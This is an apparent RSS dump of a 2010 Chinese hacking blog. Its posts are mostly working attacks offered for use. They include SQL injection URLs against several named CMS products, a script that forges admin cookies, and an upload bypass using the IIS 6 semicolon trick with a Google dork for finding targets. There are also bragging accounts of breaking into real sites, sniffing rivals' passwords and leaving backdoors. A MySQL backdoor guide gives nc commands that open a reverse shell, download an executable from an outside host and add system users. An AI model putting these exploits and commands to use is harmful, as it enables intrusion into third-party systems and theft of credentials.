神刀网http://www.nhs8.com/简者为王 技术为先 开源创意 专注android开发 ORACLE数据库SQL使用 关注开源技术 网络渗透安全 SEO网赚!RainbowSoft Studio Z-Blog 1.8 Walle Build 91204zh-CNCopyright http://www.nhs8.com 神刀网 Some Rights Reserved.粤ICP备06083217号 var locationUrl = escape(document.location.href); document.write(unescape("%3Cscript")+" charset='utf-8' src='http://union.rising.com.cn//InfoManage/TrojanInspect.aspx?p1=p11PRuO8WSiXwiGwHEu8uOp44NnQK2m5&p2=XwiJxWzSSIA=&p3=p11PRuO8WShSETV7Gpj84Q==&url="+ locationUrl + "' type='text/javascript'"+unescape("%3E%3C/script%3E"));<Wed, 10 Mar 2010 16:20:13 +0800检测OA时代ni10256@163.com (神刀)http://www.nhs8.com/post/1595.htmlWed, 10 Mar 2010 16:13:06 +0800http://www.nhs8.com/post/1595.htmlhttp://www.oatime.com/  OA时代 PR4

网站为DEDECMS 5.5 拿了最近的洞生成t.php,一句话连上,丢了大马上去

ws可用,3389可连,跨目录查看

看到360提权卫士,直接提了,远连,到手!

丢后门,留底!

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《检测OA时代》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1595.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1595http://www.nhs8.com/cmd.asp?act=tb&id=1595&key=74812776回忆社工小武&helenni10256@163.com (神刀)http://www.nhs8.com/post/1594.htmlWed, 10 Mar 2010 16:03:37 +0800http://www.nhs8.com/post/1594.html这是我在华夏黑客联盟转载的,静流--------华夏黑客联盟的讲师,其BLOG被Helen入侵了,Helen在其博客上改了首页
1.jpg



-----------------------------------------------------------------------------------------------------------------------------

下面是静流自己的讲述:
事出起因:helen太喜欢装B,拿小武入侵我BLOG的权限来改首页装B。其实我也好久没管BLOG了,BLOG空间玉米都我徒弟的,我只是挂名的,他们居然那么二,拿来装。

现在我们简单说下过程了,很多地方就不截图了,我跟小M发现HELEN跟小武都在邪十,于是我们就想从邪十入手。

拿C段其中一个服务器,服务器很BT,装了SU,但是终端连接不上,只能用LCX,
2.jpg


然后就是拿CAIN进行ARP嗅了,嗅到了小武跟HELEN的密码

3.jpg



还有邪十管理的密码,只是PHPWIND7.5还不知道怎么后台拿SHELL,

然后就是拿这些密码把小武的BLOG跟HELEN的QQ社了,HELEN还自称多NB,其实也就那样
4.jpg



引用某淫一句话:他们就是一群SB,拿一个SHELL,每个人装一次B。

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《回忆社工小武&helen》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1594.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1594http://www.nhs8.com/cmd.asp?act=tb&id=1594&key=ff4b98e5Zoomla!逐浪CMS3.2 0dayni10256@163.com (神刀)http://www.nhs8.com/post/1593.htmlWed, 10 Mar 2010 15:19:33 +0800http://www.nhs8.com/post/1593.html北洋贱队(http://bbs.seceye.org)首发 Blog:www.dongxie.org 测试版本: Zoomla!逐浪CMS3.2 + mssql for Windows 描述: Zoomla!逐浪CMS是功能强大的网站内核与管理系统,集成内容管理OASNS项目管理采集邮件订阅等强大功能,基于c#语言.net架构 开发,是目前中国唯一同步支持MSSQL与Oracle两大数据库的高端CMS,用于快速构建高效门户网站 测试方法: ——————————————————————————– 警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! 1.注入漏洞: http://www.site.com/Search/SearchList.aspx?node=0&keyword=1%25′%20Or%20Db_NaMe()=0%20oR%20′%25′=’&type=1 2.FCKeditor上传漏洞 http://www.site.com/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.site.com%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx 3.XSS脚本跨站漏洞 http://www.site.com/prompt/correct.aspx?t= 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.zoomla.cn/

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《Zoomla!逐浪CMS3.2 0day》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1593.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1593http://www.nhs8.com/cmd.asp?act=tb&id=1593&key=7d135667PHPcms2008 0dayni10256@163.com (神刀)http://www.nhs8.com/post/1592.htmlWed, 10 Mar 2010 15:12:45 +0800http://www.nhs8.com/post/1592.htmlExploit:

 

/ask/search_ajax.php?q=s%D5'%20or%20(select%20ascii(substring(password,1,1))%20from%20phpcms_member%20where%20username=0x706870636D73)>52%23

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《PHPcms2008 0day》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1592.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1592http://www.nhs8.com/cmd.asp?act=tb&id=1592&key=6b2e9910某教育培训网ODAYni10256@163.com (神刀)http://www.nhs8.com/post/1591.htmlWed, 10 Mar 2010 15:11:14 +0800http://www.nhs8.com/post/1591.html

By无晴


出错代码:

<!--#include FILE="upload.inc"-->
<%
dim upload,file,formName,formPath,iCount,fileformat
set upload=new upload_F
function MakedownName()
dim fname
    fname = now()
fname = replace(fname,"-","")
   fname = replace(fname," ","")
fname = replace(fname,":","")
    fname = replace(fname,"PM","")
    fname = replace(fname,"AM","")
fname = replace(fname,"上午","")
    fname = replace(fname,"下午","")
    fname = int(fname) + int((10-1+1)*Rnd + 1)
MakedownName=fname
end function
formPath="upload/"
iCount=0
for each formName in upload.file ''列出所有上传了的文件
set file=upload.file(formName) ''生成一个文件对象

fileformat=lcase(right(file.filename,4))
if file.FileSize>2000000 then
response.write"<script>alert('太大');location='"&request.ServerVariables("HTTP_REFERER")&"'</script>"
response.end
elseif fileformat=".asp" or fileformat=".exe" or fileformat=".txt" or fileformat=".htm" then
response.write"<script>alert('文件格式不对,请重新上传!');location='"&request.ServerVariables("HTTP_REFERER")&"'</script>"
response.end
end if

if file.FileSize>0 then         ''如果 FileSize > 0 说明有文件数据
newname=MakedownName()&"."&mid(file.FileName,InStrRev(file.FileName, ".")+1)

file.SaveAs Server.mappath(formPath&newname)   ''保存文件
iCount=iCount+1
else
response.write "未找到文件 &nbsp;&nbsp;<A HREF=javascript:history.back(1)>返回</A>"
response.end
end if
next
%>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="css.css" type="text/css">
</head>

<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">


<p>
<% response.write newname%>
</p>

</body>
</html><script language = "JavaScript">

window.opener.form1.img1.src = '/user/hy_images/upload/'+'<% response.write newname%>';
window.opener.form1.tp.value = '<% response.write newname%>';
window.close();
</Script>

很简单的的过滤,而且上传不会被改名
----------------------------------------------------------------------------------------------------------------------
利用

关键词 Geogle:inurl:geren_add.asp

上传页面user/hy_images/upload.htm

 


上传asa ,cer ,aspx,php 的马

木马目录: http://www.52hacker.cn/user/hy_images/upload/马的名字

这样就ok了。。

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《某教育培训网ODAY》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1591.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1591http://www.nhs8.com/cmd.asp?act=tb&id=1591&key=25509d12上传漏洞 hidden to text 突破手记ni10256@163.com (神刀)http://www.nhs8.com/post/1590.htmlTue, 09 Mar 2010 23:46:11 +0800http://www.nhs8.com/post/1590.html文章作者:udb311

本文是由一个上传的页面突破上传引发的,话说当时群里议论纷纷。发出XXX网站的上传地址,研究过来研究过去。没找到突破,本地修改上传提交仍然不能突破。 

就在当时,小三毛同志提出修改hidden to text利用IIS漏洞可取webshell。咱也试下这招数如何

本地构造上传 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
 <LINK href="../css/css.css" rel=stylesheet type=text/css>
 <title>上传图片</title>
 </head>
 
 <body leftmargin="0" topmargin="0">
 <table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
  <td height="20" align="center">
 
  </td>
  </tr>
 </table>
 <table width="90%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#999999">
  <form action="http://xxx.net/inn/upfilesave.asp" method="post" enctype="multipart/form-data">
 
  <tr>
  <td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
  <td height="25" bgcolor="#CCCCCC" class="td_14">上传图片</td>
  </tr>
  </table></td>
  </tr>
  <tr>
  <td height="35" align="center" bgcolor="#FFFFFF">
  <input name="image" type="file" id="image">
  </td>
  </tr>
  <tr>
  <td height="35" align="center" bgcolor="#FFFFFF">
  <input type="submit" name="Submit" value="提交" onClick="checkImage('image')">
  <input name="PathFolder" type="hidden" id="PathFolder" value="/img/trade/">
  <input name="FormName" type="hidden" id="FormName" value="add">
  <input name="parent" type="hidden" id="parent" value="img">
  <input name="Filename_Pre" type="text" id="Filename_Pre" value="">
  <input name="Create" type="hidden" id="Create" value="">
  <input type="reset" name="Submit2" value="关闭" onClick="javascript:window.close()">
  </td>
  </tr>
  </form>
 </table>
 </body>
 </html>
 <script language=javascript>
 function checkImage(sId)
 {
  if(( document.all[sId].value.indexOf(".asp") == -1) && (document.all[sId].value.indexOf(".asa") == -1)) {
  //alert("请选择gif或jpg的图象文件");
  // event.returnValue = false;
  }
 }
 </script> 保存为HTML。。。

原来

<input name="Filename_Pre" type="hidden" id="Filename_Pre" value="">  

修改

<input name="Filename_Pre" type="text" id="Filename_Pre" value=""> 

打开本地HTML提交页,上传时填充1.asp;。 

成功返回1.asp;_201036165716.jpg。IIS 6.0,成功运行小马~

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《上传漏洞 hidden to text 突破手记》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1590.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1590http://www.nhs8.com/cmd.asp?act=tb&id=1590&key=d10b82c2搜一次CMS 0day EXPni10256@163.com (神刀)http://www.nhs8.com/post/1589.htmlTue, 09 Mar 2010 23:44:36 +0800http://www.nhs8.com/post/1589.html
 

将以下内容保存为html

<style type="text/css">
<!--
.STYLE1 { font-size:13px ; font-family: Arial, Helvetica, sans-serif}
-->
from:www.3est.com
author:阿开
</style>
<span class="STYLE1">示例:新建个窗口访问下面的地址,xxx换成目标网址,得到以:分割的数据,依次填入下面的框中!<br>
http://<font color=red>36dk.com</font>/js/hits.php?type=2&id=1 and 9=0 union select concat(S_id,0x3a,S_AdminUserName,0x3a,S_AdminPassWord,0x3a,S_Permission) from s_admin limit 0,1--
<form action="" method="post" enctype="multipart/form-data" class="STYLE1">
<br><br>
S_AdminID:<input type="text" name="a" />
S_AdminUserName:<input type="text" name="b" />
S_AdminPassWord:<input type="text" name="c" />
S_Permission:<input type="text" name="d" />
<br>
<input type="submit" name="submit" value="Submit" />
</form></span>
<span class="STYLE1">
<?php
if(isset($_POST['a']))
{
echo "cookie计算出来为:<br>";
echo "S_AdminID=".$_POST['a'].";"."S_AdminUserName=".$_POST['b'].";"."S_AdminPassWord=".md5($_POST['c']).";"."S_Permission=".$_POST['d'].";"."S_Login=".md5($_POST['a'].$_POST['b'].md5($_POST['c']).$_POST['d']).";";
echo "粘贴到老兵的浏览器中,访问/admin/index.php即可!<br>";
}
?>
</span>

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《搜一次CMS 0day EXP》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1589.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1589http://www.nhs8.com/cmd.asp?act=tb&id=1589&key=dfcbf5eeMysql Doorni10256@163.com (神刀)http://www.nhs8.com/post/1588.htmlTue, 09 Mar 2010 22:35:40 +0800http://www.nhs8.com/post/1588.html

Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、WIN2003+MYSQL5.0.X下通过.

[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"

 

安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.

[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.

 

[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:

1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)

    除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.


[卸载]
在Mysql上运行"drop function state"便可卸载,但同时会造成mysql进程退出,重启后恢复正常。





Copyright © 神刀网 http://www.nhs8.com/

继续阅读《Mysql Door》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1588.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1588http://www.nhs8.com/cmd.asp?act=tb&id=1588&key=34d6178a查找管理员后台的一个技巧 ni10256@163.com (神刀)http://www.nhs8.com/post/1587.htmlTue, 09 Mar 2010 22:33:30 +0800http://www.nhs8.com/post/1587.html当我们知道一个网站的后台目录,却又无法确定后台登陆文件的时候,可以尝试在网址后面加上一个"."
比如http://www.xxx.com/admin,我们打开后显示的是Directory Listing Denied,意思也就是说找不到此目录的默认首页,
那么我们可以把地址改成www.xxx.com./admin,注意com后面多了一个".",这样的话可以直接跳转到登陆页面.
T00LS里说貌似只有在IIS下才可会出现这样的情况,我找了几个站试了一下,发现并不是所有IIS架设的站点都支持这种方法.
拿本站举个例子,打开http://www.hacksb.cn/admin,同样显示的是Directory Listing Denied,不过在加上"."的情况下,却显示Bad Request (Invalid Hostname).即域名未绑定主机状态.
虽然不能通杀,不过相对来说也算是一个不错的技巧,大家如果遇到这种情况,可以尝试一下这个方法.

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《查找管理员后台的一个技巧 》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1587.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1587http://www.nhs8.com/cmd.asp?act=tb&id=1587&key=3a8e1c33千博系统cookie注入ni10256@163.com (神刀)http://www.nhs8.com/post/1586.htmlTue, 09 Mar 2010 22:28:53 +0800http://www.nhs8.com/post/1586.html多少版本,未知

javascript:alert(document.cookie="keyword="+escape("千博%'and 1=1 and '%'='"))

javascript:alert(document.cookie="keyword="+escape("千博%'and 1=21 and '%'='"))

Copyright © 神刀网 http://www.nhs8.com/

继续阅读《千博系统cookie注入》的全文内容...

分类: 网络安全与维护 | Tags: 网络安全与维护   | 添加评论(0)

相关文章:

版权所有 神刀网 http://www.nhs8.com/ Q:46007728]]>网络安全与维护http://www.nhs8.com/post/1586.html#commenthttp://www.nhs8.com/http://www.nhs8.com/feed.asp?cmt=1586http://www.nhs8.com/cmd.asp?act=tb&id=1586&key=8a8967ba